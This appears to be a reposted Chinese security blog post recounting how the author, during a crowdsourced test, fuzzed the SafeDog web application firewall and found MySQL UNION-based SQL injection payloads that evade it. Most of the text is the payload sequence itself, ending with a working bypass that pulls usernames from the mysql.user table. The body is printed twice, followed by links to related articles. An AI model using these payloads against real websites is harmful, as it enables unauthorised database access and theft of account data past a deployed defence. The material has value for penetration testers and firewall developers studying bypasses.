Mysql下Union注入Bypass安全狗过程
2017-03-18 17:26
253 查看
文章转载于:http://www.0aa.me/index.php/archives/95/
一次众测发现个注入,然后有安全狗就顺带看了下安全狗。
先fuzz看看安全狗拦截什么关键词
union select x,x 拦截
尝试用union函数 union(select 1,2,3) 拦截
union(%20select 1,2,3,4) 不拦截,注意select前面有个空格。
之前出题的代码...懒得改了…中二。
union(%20select%201,(select%20user%20from%20mysql.user),3,4) p神说没有from就不算绕过,尝试用from注入被拦截。
union(%20select%201,(select%20user%20from(mysql.user)),3,4) 尝试把from换成函数,被拦截了。
想起来之前绕union函数前面带的空格,这里也尝试了下
union(%20select%201,(select%20user%20from(%20mysql.user)%20limit%202,1),3,4) 注意from函数里面第一位就是空格
实际上还有很多过狗的方法,我第一次跟P神交流的时候不是这个payload,那个payload还要长很多,但是P神说了重要的是过程,我再研究了下,发现这个payload比较短点,最后希望跟各位大师傅一起学习,最后的最后感谢下phithon师傅
一次众测发现个注入,然后有安全狗就顺带看了下安全狗。
先fuzz看看安全狗拦截什么关键词
union select x,x 拦截
尝试用union函数 union(select 1,2,3) 拦截
union(%20select 1,2,3,4) 不拦截,注意select前面有个空格。
之前出题的代码...懒得改了…中二。
union(%20select%201,(select%20user%20from%20mysql.user),3,4) p神说没有from就不算绕过,尝试用from注入被拦截。
union(%20select%201,(select%20user%20from(mysql.user)),3,4) 尝试把from换成函数,被拦截了。
想起来之前绕union函数前面带的空格,这里也尝试了下
union(%20select%201,(select%20user%20from(%20mysql.user)%20limit%202,1),3,4) 注意from函数里面第一位就是空格
实际上还有很多过狗的方法,我第一次跟P神交流的时候不是这个payload,那个payload还要长很多,但是P神说了重要的是过程,我再研究了下,发现这个payload比较短点,最后希望跟各位大师傅一起学习,最后的最后感谢下phithon师傅
相关文章推荐
- 存储过程造成严重安全后门――记某电商SQL注入安全事件实例分析
- 安全检测Oracle注入点全过程
- SQL注入全过程,含实例初步注入--绕过验证,直接登录安全较低公司网站登陆框如下:可以看到除了账号密码之外
- SQLServer 2008中的代码安全 存储过程加密与安全上下文
- ACE的ACE_Logging_Strategy类中的一个多线程安全问题的发现及解决过程
- PHP安全编程:会话数据注入
- 网络安全系列之十八 MySQL基本操作(PHP注入基础)
- 预防sql注入安全的函数
- PHP安全编程:shell命令注入(转)
- [转]网络安全设备Bypass功能介绍及分析 - [网络编程]
- 安全证书、OpenSSL、keystore(keystore生成过程讲得多)
- 通用分页存储过程注入问题解决方案:不用存储过程,通用分页查询方法
- Spring 注入全过程图解
- java安全问题(开发过程中一定要注意!十大漏洞)
- Java实时多任务调度过程中的安全监控设计
- Web安全之SQL注入
- PHP通用防注入安全代码
- 典型的 SQL 注入过程
- MSSQL自身存储过程的一个注入漏洞